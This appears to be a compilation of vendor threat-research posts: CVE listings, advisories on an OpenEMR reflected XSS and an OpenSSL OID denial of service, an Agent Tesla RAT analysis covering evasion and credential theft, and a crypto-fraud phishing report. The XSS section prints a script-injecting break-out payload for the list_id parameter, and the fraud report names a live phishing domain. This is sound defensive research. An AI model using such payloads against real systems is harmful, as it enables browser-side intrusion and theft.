CVE-2023-35350 Windows Active Directory Certificate Services (AD CS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35351 Windows Active Directory Certificate Services (AD CS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35352 Windows Remote Desktop Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35353 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35356 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35357 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35358 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35360 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35361 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35362 Windows Clip Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35363 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35364 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35365 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35366 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35367 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35373 Mono Authenticode Validation Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-35374 Paint 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36867 Visual Studio Code GitHub Pull Requests and Issues Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36868 Azure Service Fabric on Windows Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36871 Azure Active Directory Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-36872 VP9 Video Extensions Information Disclosure Vulnerability
There are no known exploits in the wild.

OpenEMR Reflected XSS Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  OpenEMR is a comprehensive open-source electronic health records (EHR) and medical practice management application. It provides an array of functionalities aimed at enhancing the efficiency of medical practice management. Among the critical features it provides are patient statistics, medical billing, electronic medical record (EMR) generation, and appointment scheduling. The listed capabilities empower medical practitioners, clinics, and hospitals to effectively manage and coordinate patient schedules, maintain detailed patient records, and streamline the billing process electronically. OpenEMR is designed with a flexible, user-friendly interface, making it an accessible solution for healthcare providers aiming to digitize and optimize their administrative and patient care processes. As an open-source platform, it also affords the flexibility of customization according to individual or institutional needs, further enhancing its applicability across a broad range of healthcare settings.

  A reflected cross-site scripting vulnerability has been identified in OpenEMR. This vulnerability arises from inadequate input validation associated with the ‘list_id’ parameter in ‘share_template.php’.

  A remote attacker could exploit this vulnerability by enticing a victim to open a crafted URL. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim’s browser.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2948.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.6 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is required.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The vulnerability stems from inadequate validation of the “list_id” parameter in the “share_template.php” file. When a request is submitted to the RequestURI “library/custom_template/share_template.php”, “share_template.php” generates HTML content that also contains JavaScript code. Within that generated JavaScript, the value of the “list_id” parameter appears in the definition of a function called “add_template()”, as illustrated below:
  
  where $list_id is first sanitized with the PHP htmlspecialchars() function.

  However, htmlspecialchars() is ineffective as XSS sanitization in this context, because it only escapes the characters “<”, “>”, and single and double quotes. An attacker can bypass it by sending JavaScript code that avoids those characters in the “list_id” request parameter of a request to the “share_template.php” endpoint. With a specially tailored “list_id” value, the attacker can break out of the original “add_template()” function definition and append their own JavaScript code immediately after it. For instance, consider a “list_id” parameter with a crafted value like the one below:
  
  “share_template.php” will then generate the following JavaScript inside its HTML output:
  
  In this scenario, the crafted value closes the original “add_template()” function definition and inserts a script statement, “alert(55555)”, right after it. Consequently, “alert(55555)” executes when the HTML returned by the server is loaded in the user’s browser. If “alert(55555)” were replaced with a different malicious script, that script would execute in the browser, which is what makes this a cross-site scripting vulnerability.
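
  The contrast between the weak and the context-aware encoding can be shown in a few lines. The following Python is an added example written for this write-up; it is not OpenEMR code, and the add_template() template it renders, the function names render_vulnerable/render_hardened and the sample list_id values are all assumptions made for the illustration:

```python
import html
import json
import re

# Hypothetical rendering template standing in for the JavaScript that
# share_template.php emits; the real file's markup is not reproduced here.
TEMPLATE = "function add_template() {{\n  var list_id = {value};\n  return list_id;\n}}\n"

# Constructed sample values (assumptions): an ordinary id, and a value that
# contains none of & < > " ' so htmlspecialchars()-style escaping leaves it unchanged.
NORMAL_LIST_ID = "hist_list"
BREAKOUT_LIST_ID = "x};alert(55555);function f(){"

# Allowlist for what a list identifier is permitted to look like (assumption).
LIST_ID_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")


def render_vulnerable(list_id: str) -> str:
    """Mirrors the weak pattern: HTML-escape (as htmlspecialchars() does) and
    splice the result directly into JavaScript source, unquoted."""
    return TEMPLATE.format(value=html.escape(list_id))


def js_string_literal(value: str) -> str:
    """Context-aware encoding: emit the value as a JSON string literal and
    additionally \\uXXXX-escape the characters that matter inside <script>."""
    encoded = json.dumps(value)          # escapes " and \ and non-ASCII
    for ch in "<>&":
        encoded = encoded.replace(ch, "\\u%04x" % ord(ch))
    return encoded


def render_hardened(list_id: str) -> str:
    """Allowlist the identifier first, then embed it only as a JS string literal."""
    if not LIST_ID_RE.match(list_id):
        raise ValueError("list_id rejected by allowlist")
    return TEMPLATE.format(value=js_string_literal(list_id))


def hardened_accepts(list_id: str) -> bool:
    try:
        render_hardened(list_id)
        return True
    except ValueError:
        return False


def survives_html_escaping(value: str) -> bool:
    """True when htmlspecialchars()-style escaping returns the value unchanged,
    i.e. it contains none of the five characters that function escapes."""
    return html.escape(value) == value


def literal_round_trips(value: str) -> bool:
    """The encoded literal must parse back to exactly the original value."""
    return json.loads(js_string_literal(value)) == value


def statement_count(script: str) -> int:
    """Rough structural check: count ';' outside double-quoted string literals.
    A correctly rendered TEMPLATE always has exactly two."""
    stripped = re.sub(r'"(?:[^"\\]|\\.)*"', '""', script)
    return stripped.count(";")


if __name__ == "__main__":
    print(render_vulnerable(BREAKOUT_LIST_ID))   # extra statements appear
    print(TEMPLATE.format(value=js_string_literal(BREAKOUT_LIST_ID)))  # stays a string
```

  The statement count is a cheap stand-in for a JavaScript parser: the vulnerable rendering of the break-out value gains two statements, while the same value encoded as a string literal (or rejected by the allowlist) leaves the function body untouched.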

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The target user must have network connectivity to the affected ports.
  • The attacker must be able to deliver a malicious URL to a target user.

Triggering Conditions:

  A user is lured by an attacker into opening a URL that contains a carefully designed list_id parameter. The vulnerability manifests itself when the user initiates the URL in a web browser.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 19216 OpenEMR Cross-Site Scripting

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following patch to address this issue:
  Vendor Advisory

Agent Tesla RAT Disguised As NSIS Installer

Overview

The SonicWall Capture Labs Research team recently observed an Agent Tesla sample that is loaded by a native loader. Agent Tesla is an advanced Remote Access Trojan (RAT) developed on the Microsoft .NET framework and capable of stealing sensitive information. It has been one of the most prevalent malware families over the past couple of years.

In this blog post, we will discuss:

  • Capabilities of Agent Tesla, with a complete catalog of targeted software.
  • How a native loader is used to load Agent Tesla.
  • Evolution of Agent Tesla’s string decryption algorithm.
  • An approach for automatic string decryption.

Introduction

Agent Tesla malware first appeared in 2014, has been active for over nine years, and is constantly updated by its threat actor with new capabilities. Agent Tesla’s main objectives are credential stealing, keylogging, screen capture, clipboard capture, and stealing the victim’s application data and sending it to the threat actor.

Infection Cycle

Agent Tesla is mainly delivered through phishing emails.

Fig 1. Infection Cycle

Unpacking of AgentTesla

The recent variant of Agent Tesla is distributed as an NSIS installer consisting of an NSIS script, a plugin DLL and an encrypted payload file.

Fig 2. Extracted Files of NSIS installer

Layer 1 – Plugin DLL

The NSIS plugin DLL calls its exported function “HvDeclY”, which decrypts the layer 2 shellcode.

Layer 2 – Shellcode

API HASHING

The shellcode uses API hashing to obfuscate its API calls.

Fig 3. Custom API Hashing Algorithm

ANTI-EMULATION

The shellcode crashes itself by jumping to an invalid address when dwNumberOfProcessors < 1 or when the VirtualAllocExNuma API is unable to allocate memory.

The shellcode has an anti-emulation check: it allocates 381 MB of memory, sets each byte to 0 and then frees that memory.

On 64-bit systems, the shellcode uses the Heaven’s Gate technique to hinder analysis in a debugger.

Fig 4. Heaven’s Gate call

PROCESS HOLLOWING

On 64-bit systems the shellcode executes some of the APIs used for process hollowing through the syscall instruction. On 32-bit systems the same APIs are invoked through the sysenter instruction.

Fig 5. 64-bit Code, Syscall through Heaven’s Gate

This layer serves as a loader that begins the execution of the native loader.

Native Loader

The layer 2 shellcode decrypts an encrypted native C++ loader and starts its execution. This Agent Tesla variant differs notably from previously examined variants: here Agent Tesla is loaded via a native C++ loader instead of multiple stages of .NET assembly modules.

The native loader stores the final Agent Tesla payload in its resource directory. The loader integrates the Common Language Runtime via the CLR hosting interfaces in order to load and run .NET assemblies; the functions used for CLR hosting are implemented by mscoree.dll.

Fig 6. API call sequence to load a .NET managed assembly from unmanaged code.

This native loader injects the final Agent Tesla payload into a newly created process and starts its execution.

Technical Analysis of Agent Tesla

Capabilities of Agent Tesla

This recent version of Agent Tesla harvests a variety of sensitive data from a wide selection of browsers, VPN clients, FTP clients, email clients and more. The data taken from an application includes its credentials, the “\user data” directory of the particular browser, cookies from browsers and FTP applications, and configuration data.

  • Data Harvesting 
    • Browsers: IE/Edge, UC Browser, Safari for Windows, QQ Browser, Falkon Browser, Flock Browser, Opera Browser, Yandex Browser, Iridium Browser, Chromium, 7 Star, Torch Browser, Cool Novo, Chrome Plus, Kometa, Amigo, Brave, Cent Browser, Chedot, Orbitum, Sputnik, Comodo Dragon, Vivaldi, Citrio, 360 Browser, Uran, Liebao Browser, Elements Browser, Epic Privacy, Cốc Cốc browser, Sleipnir 6, QIP Surf, Coowon, Google Chrome, Edge Chromium, Firefox, SeaMonkey, BlackHawk, CyberFox, K-Meleon, IceCat, Pale Moon, IceDragon, WaterFox, Postbox
    • Email clients: Eudora, The Bat, Becky, Outlook, Windows Mail App, FoxMail, Opera Mail, PocoMail, eM Client, Mailbird, Thunderbird, Claws, IncrediMail.
    • FTP/SCP clients: FileZilla, CoreFTP, WinSCP, Flash FXP, FTP Navigator, SmartFTP, WS_FTP, FtpCommander, FTPGetter.
    • Databases: Berkeley DB, MySQL Workbench.
    • VPN clients: NordVPN, OpenVPN, Private Internet Access VPN.
    • Virtual network computing clients: RealVNC, WinVNC3, TightVNC, UltraVNC.
    • Instant Messaging programs: Discord, Paltalk, Pidgin, Psi/Psi+, Trillian
    • Dynamic DNS clients: DynDns
    • Download Managers: JDownloader, Internet Downloader Manager
    • Windows Credentials: Windows Secure Note, Windows Web Password Credential, Windows Credential Picker Protector, Web Credentials, Windows Credentials, Windows Domain Certificate Credential, Windows Domain Password Credential, Windows Extended Credential
  • Keystrokes logging
  • Clipboard Scraping
  • Screenshot Capturing
  • Deleting Zone identifier
    • Agent Tesla deletes the Zone.Identifier to remove the trace that the file originated from an untrusted source.

      Fig 7. Deleting Zone identifier

Fingerprinting

Agent Tesla uses the computer name, operating system, processor name, total memory, current date and time, IP address, internet connectivity, username, MAC address and serial number for fingerprinting.

Persistence

Agent Tesla achieves persistence by adding two autorun registry keys.

  • Software\Microsoft\Windows\CurrentVersion\Run
  • SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run

Exfiltration

Normally Agent Tesla exfiltrates collected data via FTP, HTTP, SMTP or a Telegram bot, but this variant only uses SMTP to exfiltrate data.

The malware uses a compromised email account to exfiltrate the collected data to a mail server managed by the attacker.

The techniques discussed above are common to most .NET stealers. The SonicWall research team has provided a full explanation of these techniques in the Unmasking .Net Stealer and Redline blog posts.

Configuration Data

Agent Tesla keeps its configuration data encoded.

Fig 8. Agent Tesla’s Decoded Configuration Data

Evolution of String decryption Algorithm

In this section we discuss the evolution of Agent Tesla’s string decryption algorithms.

Agent Tesla actively changes its tactics to hide from security software. One of these tactics is string encryption, which is crucial for keeping strings hidden from security software and reverse engineers. All the important configuration data and IOCs, such as the list of browser names, the C2 host name and the SMTP credentials, are stored in Agent Tesla as encrypted strings.

Version 1

In this version the encrypted strings are stored base64 encoded.

The decryption function “s_method_0” uses the SHA1 hashing algorithm to generate a key from a hardcoded password and salt. The base64-decoded string is then decrypted with AES in CBC mode using the generated key and a hardcoded IV.

Fig 9. AES decryption function (bottom), example of an encrypted string (top)

Version 2

In this version Agent Tesla uses AES in CBC mode as in version 1, but with a different key and IV for each encrypted string. Strings are stored in an array of objects, where each object has three elements: the encrypted string, the key and the IV.

Fig 10. AES decryption function (bottom), example of an encrypted string (top)

Version 3

In this version Agent Tesla implements simple XOR decryption. The XORed strings are stored in a byte array.

The decryption function is defined in the .cctor() constructor of the binary. When the malware starts executing, its constructor is called automatically and decrypts the encrypted string array using a hardcoded single-byte XOR key. To locate a particular string, the malware uses the array offset and the size of the string, as there is no separator between strings.

Fig 11. Simple XOR decryption (bottom), example of an encrypted string (top)
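
To make the version 3 scheme concrete, here is an added Python example (not code from the malware or from SonicWall): it builds a string blob the way the .cctor() expects it, decrypts it with the single-byte key, slices strings by offset and size, and, going one step beyond the text, recovers an unknown key with a known-plaintext crib, which is what an analyst does when the hardcoded key has not yet been located. The blob, key and strings are constructed sample data, and the function names are this example's own:

```python
from typing import List, Optional, Tuple

# Constructed sample data (not bytes taken from a real binary).
XOR_KEY = 0x5A
PLAINTEXT_STRINGS = ["Google Chrome", "User Data", "Login Data", "smtp.example.invalid"]


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same single-byte key (the version 3 primitive)."""
    return bytes(b ^ key for b in data)


def build_string_blob(strings: List[str], key: int) -> Tuple[bytes, List[Tuple[int, int]]]:
    """Concatenate strings with no separator, as version 3 does, record the
    (offset, size) of each one, and XOR the whole blob with the key."""
    table: List[Tuple[int, int]] = []
    plain = bytearray()
    for s in strings:
        raw = s.encode("utf-8")
        table.append((len(plain), len(raw)))
        plain += raw
    return xor_bytes(bytes(plain), key), table


ENCRYPTED_BLOB, STRING_TABLE = build_string_blob(PLAINTEXT_STRINGS, XOR_KEY)


def decrypt_all(blob: bytes, key: int) -> bytes:
    """What the .cctor() does once at start-up: decrypt the entire array."""
    return xor_bytes(blob, key)


def get_string(decrypted: bytes, offset: int, size: int) -> str:
    """What each call site does: slice the decrypted array by offset and size."""
    return decrypted[offset:offset + size].decode("utf-8")


def dump_strings(blob: bytes, table: List[Tuple[int, int]], key: int) -> List[str]:
    """Recover every string given the blob, the offset/size table and the key."""
    decrypted = decrypt_all(blob, key)
    return [get_string(decrypted, off, size) for off, size in table]


def recover_key(blob: bytes, crib: bytes) -> Optional[int]:
    """Known-plaintext search for the case where the key has not been found yet:
    try all 256 single-byte keys and keep the first under which the crib appears."""
    for key in range(256):
        if crib in xor_bytes(blob, key):
            return key
    return None


if __name__ == "__main__":
    key = recover_key(ENCRYPTED_BLOB, b"Chrome")
    print("recovered key: 0x%02X" % key)
    print(dump_strings(ENCRYPTED_BLOB, STRING_TABLE, key))
```

The crib search works because a browser name or similar well-known string is almost always present in the decrypted table; with a real sample, the offset/size table comes from the call sites that pass those two constants to the lookup routine.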

Version 4

In this version the Agent Tesla author has copied and abused the open-source .NET string encryption tool XorStringsNET.

In this version strings are stored as an encrypted data blob. The data blob has the format shown below.

As per the .NET file format, the data blob is stored as a field of a structure, as shown below.

Fig 12. Data blob stored as a structure with a size of 19953 bytes

Approach for string decryption

1) We can use the de4dot tool to automatically decrypt the strings and obtain a binary file in which the strings are decrypted. It comes with multiple options for manipulating the .NET binary file.

Consider the command below as an example of decrypting the strings.

de4dot.exe -f file -o outfile --strtyp delegate --strtok 0x6000001

--strtok: the method token of the decryption method, which can be obtained easily using dnSpy.

Fig 13. de4dot cmdline options

--strtyp: this option can be one of the methods listed below.

Fig 14. String decrypter type available

2) Python scripts that parse .NET metadata.

To write a Python script that decrypts the strings automatically, we need to find the required data as below.

  • .NET metadata: parse the required metadata, such as the method/structure token, RVA and file offset needed for string decryption.

Many open-source .NET parsing libraries are available on GitHub.

Conclusion

Agent Tesla RAT has been active for several years and continues to evolve. It has developed new evasion techniques, such as the use of a native C++ loader. Agent Tesla successfully harvests data and exfiltrates it to the attacker. With each version, Agent Tesla continues to improve its string encryption functions and to add to its catalog of data-stealing capabilities. We expect major improvements in its next version.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AgentTesla.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

IOCs

D63FE952E90788072C6166A39BDE21B5 – NSIS Installer

B67E8512632AAE047A483B643EA6B1B4 – NSIS Plugin DLL

F8F2ED5A4E1FB2F14D49349CE4E2B779 – Encrypted Stage 2

57B264BF971F2BCF62140130CFD94CF5 – C++ Loader

A0A5B08B0EFFF9FAA96455B699893F76 – Agent Tesla

OpenSSL OBJ_obj2txt Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  OpenSSL stands as a renowned open-source library, primarily utilized for SSL and TLS. The Secure Socket Layer (SSL) and the Transport Layer Security (TLS), referenced interchangeably from this point onward, are cryptographic protocols designed to ensure communication security, data integrity, and authentication over TCP/IP networks. By harnessing the power of cryptography primitives—symmetric key ciphers, cryptographically robust hash functions, and the Public Key Infrastructure (PKI)—these protocols facilitate secure communication between hosts over unsecured networks.

  PKI, a prevalent authentication system for TLS, is dependent on certificates for conveying necessary cryptographic data, such as RSA keys, signatures, and identity information, all vital for encryption and authentication. The ITU standard, X.509, details the structure of these public-key certificates.

  There are three existing versions of X.509: X.509 v1 and v3 are older and newer standards, respectively, utilized for certificate representation. Conversely, X.509 v2 outlines the standard for representing Certificate Revocation Lists (CRLs). These certificate representations are outlined using Abstract Syntax Notation One (ASN.1) and encoded via the Distinguished Encoding Rules (DER).

  Recently, a denial-of-service vulnerability has been discovered in the OpenSSL library. This vulnerability emanates from delays encountered during the processing of ASN.1 OBJECT IDENTIFIERs.

  A remote attacker can exploit this vulnerability by transmitting specially crafted packets to an OpenSSL client, or a server that has purposefully activated client authentication. Should this exploitation prove successful, it could instigate denial-of-service conditions on the impacted service.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2650.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 4.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:C).

  Base score is 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is none.
    • Impact of this vulnerability on data integrity is none.
    • Impact of this vulnerability on data availability is low.
  Temporal score is 4.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  It’s important to shed light on the OBJECT IDENTIFIER tag and its workings. The OBJECT IDENTIFIER data type, encoded into a TLV (Type, Length, Value) triplet, commences with a Tag value of 0x06. The encoding of each integer in a dotted decimal object identifier (OID) is governed by a set of specific rules. First and foremost, the OID’s initial two nodes are encoded onto a solitary byte, with the first node being multiplied by the decimal 40 and the result is added to the second node’s value. Secondly, node values that are either equal to or less than 127 are encoded on a single byte. Lastly, node values that are equal to or exceed 128 are encoded on multiple bytes, with Bit 7 of the leftmost byte set to one and Bits 0 through 6 of each byte containing the encoded value.

  For illustration, consider the OBJECT IDENTIFIER “1.3.6.1.4.1.311.21.20”. It would be encoded as follows: “06 09 2b 06 01 04 01 82 37 15 14”. Here, “06” stands for the OBJECT IDENTIFIER tag, “09” represents the length of the OBJECT IDENTIFIER, and the subsequent bytes are the encoded values, utilizing the previously mentioned three rules.

  The OpenSSL library supports parsing DER-encoded ASN.1 OBJECT IDENTIFIERs; specifically, it provides the API OBJ_obj2txt() for this purpose. The function starts by decoding the first byte as the two initial sub-identifiers, per Rule 1. It then examines each byte of the remaining encoded data in a while loop. If a byte is less than 0x80 (128), its value is taken directly as the decimal sub-identifier, per Rule 2. If the value equals or exceeds 0x80, the function discards Bit 7, keeps only the lower 7 bits (Bits 6 – 0), and repeats this step in a for loop until a byte less than 0x80 is encountered. It then concatenates the lower 7 bits of all these bytes and converts the bit stream into an integer, whose decimal value is the sub-identifier. However, the function imposes no limit on the length of the encoded OBJECT IDENTIFIER data. Consequently, the decoding step can take a very long time if the concatenated value forms a large integer.
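
  The encoding rules and the decoding loop described above, as an added Python example (not OpenSSL code): encode_oid() applies the three rules, decode_oid() mirrors the base-128 reassembly and, as the kind of bound the advisory points at, refuses a sub-identifier that spans more than a configurable number of bytes. MAX_SUBID_BYTES, long_subid_oid() and the function names are assumptions of this example, not values from OpenSSL.

```python
from typing import List

# Cap chosen for this example (an assumption, not the value OpenSSL uses): a
# sub-identifier spread over more than this many bytes is rejected instead of
# being accumulated into an ever-larger integer.
MAX_SUBID_BYTES = 16


def encode_oid(dotted: str) -> bytes:
    """DER-encode a dotted-decimal OID as a TLV with tag 0x06 (short-form length only)."""
    nodes = [int(n) for n in dotted.split(".")]
    if len(nodes) < 2 or not 0 <= nodes[0] <= 2 or (nodes[0] < 2 and nodes[1] > 39):
        raise ValueError("invalid OID: %s" % dotted)
    # Rule 1: the first two nodes share one sub-identifier, 40 * first + second.
    subids = [nodes[0] * 40 + nodes[1]] + nodes[2:]
    body = bytearray()
    for value in subids:
        # Rules 2 and 3: base-128 groups, bit 7 set on every byte except the last.
        groups = [value & 0x7F]
        value >>= 7
        while value:
            groups.append(0x80 | (value & 0x7F))
            value >>= 7
        body.extend(reversed(groups))
    if len(body) > 127:
        raise ValueError("long-form length is not handled by this example")
    return bytes([0x06, len(body)]) + bytes(body)


def decode_oid(der: bytes, max_subid_bytes: int = MAX_SUBID_BYTES) -> str:
    """Decode a DER OBJECT IDENTIFIER to dotted decimal, refusing any
    sub-identifier that spans more than max_subid_bytes bytes."""
    if len(der) < 3 or der[0] != 0x06:
        raise ValueError("not an OBJECT IDENTIFIER TLV")
    length = der[1]
    if length & 0x80 or len(der) != 2 + length:
        raise ValueError("bad or unsupported length")
    subids: List[int] = []
    value = width = 0
    for b in der[2:]:
        width += 1
        if width > max_subid_bytes:
            raise ValueError("sub-identifier exceeds %d bytes" % max_subid_bytes)
        value = (value << 7) | (b & 0x7F)   # keep bits 6..0, drop bit 7
        if not b & 0x80:                    # bit 7 clear: last byte of this sub-identifier
            subids.append(value)
            value = width = 0
    if width:
        raise ValueError("truncated sub-identifier")
    first = subids[0]                       # undo Rule 1
    if first < 40:
        lead = [0, first]
    elif first < 80:
        lead = [1, first - 40]
    else:
        lead = [2, first - 80]
    return ".".join(str(n) for n in lead + subids[1:])


def long_subid_oid(n_bytes: int) -> bytes:
    """Constructed test input: '1.3' followed by a single sub-identifier spread
    over n_bytes base-128 bytes (continuation bytes 0xFF, final byte 0x7F)."""
    body = bytes([0x2B]) + bytes([0xFF] * (n_bytes - 1)) + bytes([0x7F])
    return bytes([0x06, len(body)]) + body


def decodes_within_cap(der: bytes, cap: int) -> bool:
    """True when decode_oid() accepts the input under the given byte cap."""
    try:
        decode_oid(der, cap)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(encode_oid("1.3.6.1.4.1.311.21.20").hex(" "))
    print(decode_oid(bytes.fromhex("06092b0601040182371514")))
```

  The cap is the defensive point: a decoder that bounds how many bytes one sub-identifier may occupy turns the unbounded big-integer conversion into an immediate rejection, which is the behaviour a hardened parser should have when it is fed attacker-controlled DER.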

Triggering the Problem:

  • The target must be running a vulnerable version of the affected product.
  • The attacker must have the ability to deliver a malicious ASN.1 DER file to the target.

Triggering Conditions:

  The vulnerability can be exploited if the attacker successfully delivers a malicious certificate or any other file in DER format to applications utilizing the OpenSSL library. The vulnerability is subsequently triggered upon the parsing of this malicious file, establishing a potential security risk for the system.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • FTP
    • HTTP
    • HTTPS
    • IMAP
    • NFS
    • POP3
    • SMB/CIFS
    • SMTP
    • ESMTP
    • SIPS

  Get Request:

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS:19207 OpenSSL OBJ_obj2txt Function DoS

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Apply the vendor-provided patch to eliminate the vulnerability.
    • Filter attack traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Google script being abused for Cryptocurrency fraud

SonicWall Capture Labs Research team has discovered an ongoing instance of cryptocurrency fraud that utilizes legitimate Google services, specifically Google Script macros. Threat actors deliberately choose these platforms because they are convenient to use and because malicious code hosted there can evade detection by anti-malware systems.

Google Script macros are primarily designed to enhance productivity and streamline workflows within Google services. However, threat actors are now exploiting them for fraudulent purposes, finding ways to execute malicious code within the context of legitimate Google applications.

In this case, a PDF file is being circulated, containing a malicious URL that was created using Google Script. Once the user interacts with this URL, they are redirected to the actual fraudulent website.

Fig: PDF File

Shown below is the response to the malicious URL built with a Google Script macro.

Fig: Fiddler capture of malicious Google Script Macro

When the URL in the PDF file is opened, it shows Google’s message that this application was created by another user, not by Google. When the user clicks through on the web page, it redirects to office[.]proprogramvipt[.]top.

Fig: Google script malicious URL

After the redirection, on this deceptive web page the user is confronted with a warning message indicating that their account is at risk of deletion due to inactivity. To add a sense of urgency, a countdown timer is displayed, suggesting that the account will be deleted imminently.

In order to prevent the account deletion and purportedly withdraw the funds (which, in reality, are non-existent), the user is instructed to sign in.

Fig: Warning for account deletion

Upon signing in, the user is presented with a prepopulated sign-in page that appears legitimate. The page is carefully designed to show an enticing welcome-back message, which includes displaying the user’s Bitcoin balance in both BTC and USD. This serves as bait to lure the user into continuing with the process.

Fig: Sign-in & welcome message

To create an illusion of authenticity, various elements that mimic legitimate features commonly found on cryptocurrency platforms are presented. These elements include:

History: A fabricated transaction history is displayed, showcasing previous transactions to make the platform appear genuine.

User Chat: Fictitious comments and messages from fake users are shown, attempting to simulate user activity and engagement on the platform.

Settings: Users are provided with an option to collect bitcoins, along with the ability to change their password. This is aimed at giving the impression of user control and customization.

News: Fake news articles are presented, falsely claiming updates such as a switch to a new cryptocurrency system, the addition of PayPal payouts, or technical server-related updates. These news pieces aim to instill a sense of credibility and innovation.

All of these elements are carefully designed to create an atmosphere of legitimacy and trust, further deceiving users into believing that the fraudulent platform is genuine and reliable.

Fig: News, Settings, Chat & History

It shows the current balance in BTC and USD with a button to collect bitcoin bonuses.

Fig: Collect BTC Bonuses

After clicking the “Collect Bitcoin Bonuses” button, it shows a progress bar, as if mining were going on in the system, along with fake transaction hashes.

Fig: Fake mining

Once the progress bar reaches 100%, it shows the collected BTC and a “get paid” button.

Fig: BTC collection

After clicking “get paid”, it asks for the user’s personal details along with account/card details.

Fig: User’s details

After collecting all the details, it shows the details being forwarded to a manager, and its own chatbot then states that the details are verified, without any validation, even if random input is given.

Fig: Chatbot

Then, for the currency exchange, it redirects to BTCPay and the user has to pay in bitcoin.

Fig: BTCPay

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: CryptoFraud.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Indicators of Compromise (IOC):

671ea7c95223fc15b2dbe03bc55acc44d81f0f69c1a3686c9f8db174df3e2710

Barracuda ES Gateway Reverse Shell Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  The Barracuda Email Security Gateway is a comprehensive email security solution developed to safeguard businesses from a multitude of email threats such as spam, viruses, phishing, DoS attacks, and data leaks. It is available in physical and virtual forms and offers thorough inbound and outbound email filtering, data leak prevention, and email encryption. It also boasts advanced features like protection against sophisticated threats like ransomware and zero-day attacks. In addition, it employs an outbound filtering system to avert data loss and uphold the reputation of your email server’s IP address.

  The appliance form factor of the Barracuda Email Security Gateway pertains to its physical variant, a standalone device installable directly into an organization’s network infrastructure.

  A remote command injection vulnerability has been discovered in the Barracuda Email Security Gateway product, affecting versions 5.1.3.001 to 9.2.0.006. This vulnerability stems from an insufficient sanitization process of .tar files (tape archives).

